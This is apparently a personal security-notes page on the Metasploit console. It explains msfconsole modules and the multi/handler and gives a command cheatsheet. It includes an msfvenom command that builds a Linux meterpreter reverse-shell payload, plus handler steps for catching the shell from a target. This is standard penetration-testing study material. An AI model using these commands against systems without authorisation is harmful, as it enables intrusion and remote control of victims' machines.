Metasploit Console

A Cyber Security Research Dumpsite

Metasploit Console

Msfconsole:

Definition

Msfconsole – the main command line tool used for exploitation. Just like msfvenom, msfconsole is pre-installed on Kali Linux.

Msfconsole consists of four main modules: payloads, exploits, encoders and auxiliary. All of these modules allow you to change the parameters for customised attacking. To see a full list of each of these components, use the command ‘show’ followed by the component.

A multi-handler enables the attacker to gain shell access to a machine with the same system/architecture and wait for attacker instructions to execute payloads. This operates similarly to a netcat session, or as a ‘smart listener’. When sending a handler to a target machine, a small ‘stub’ is placed, containing information about the payload you have set. You then connect to target port and send the exploit for the ‘stub’ to execute. Once sent, you can listen on the port to send commands on the target machine. A multi-handler can do this but you can also send this payload to multiple targets; this payload also maintains a ‘persistent’ state, so if a target restarts, listening on the port again will automatically open a shell.

Exploit/Multi/Handler

To load Multi/Handler:
use exploit/multi/handler

show exploits Lists the exploits you can run.
show payloadsLists the payloads you can execute on the exploited system.
info exploit [exploit name]Lists a description of a specific exploit + various options and requirements.
info payload [payload name] Lists a description of a specific payload + various options and requirements.
use [exploit name]msfconsole will enter into a specific exploit’s environment.

show payloadsLists the payloads compatible with the specific exploit you have selected
set PAYLOADAllows you to set the specific payload for your exploit
show targetsLists the possible targets (OS’s & applications) that can be exploited
set [TARGET] Select your specific target OS/application target

set RHOSTSet your target host’s IP address.
set LHOST Set the local host’s IP address for the reverse communications needed to open the reverse command shell

You can also combine multi/handler with msfvenom, for example; to create a reverse_tcp listener + payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=[HOST_IP] lport=[LISTENING_PORT] -f elf > shell.elf
then you open your multi/handler:
use multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST [HOST IP]
set LPORT [LISTENING_PORT]
exploit
Now you will have a listener, upload your payload and you should see something like this:

Cheatsheet:

back – Move back from the current context
banner – Display an awesome metasploit banner
cd – Change the current working directory
color – Toggle color
connect – Communicate with a host
edit – Edit the current module with $VISUAL or $EDITOR
exit – Exit the console
get – Gets the value of a context-specific variable
getg – Gets the value of a global variable
go_pro – Launch Metasploit web GUI
grep – Grep the output of another command
help – Help menu
info – Displays information about one or more module
irb – Drop into irb scripting mode
jobs – Displays and manages jobs
kill – Kill a job
load – Load a framework plugin
loadpath – Searches for and loads modules from a path
makerc – Save commands entered since start to a file
popm – Pops the latest module off the stack and makes it active

previous – Sets the previously loaded module as the current module
pushm – Pushes the active or list of modules onto the module stack
quit – Exit the console
reload_all – Reloads all modules from all defined module paths
rename_job – Rename a job
resource – Run the commands stored in a file
route – Route traffic through a session
save – Saves the active datastores
search – Searches module names and descriptions
sessions – Dump session listings and display information about sessions
set – Sets a context-specific variable to a value
setg – Sets a global variable to a value
show – Displays modules of a given type, or all modules
sleep – Do nothing for the specified number of seconds
spool – Write console output into a file as well the screen
threads – View and manipulate background threads
unload – Unload a framework plugin
unset – Unsets one or more context-specific variables
unsetg – Unsets one or more global variables
use – Selects a module by name
version – Show the framework and console library version numbers

More in-depth description on some commands mentioned here (Offensive Security) and here (AndreaFortuna)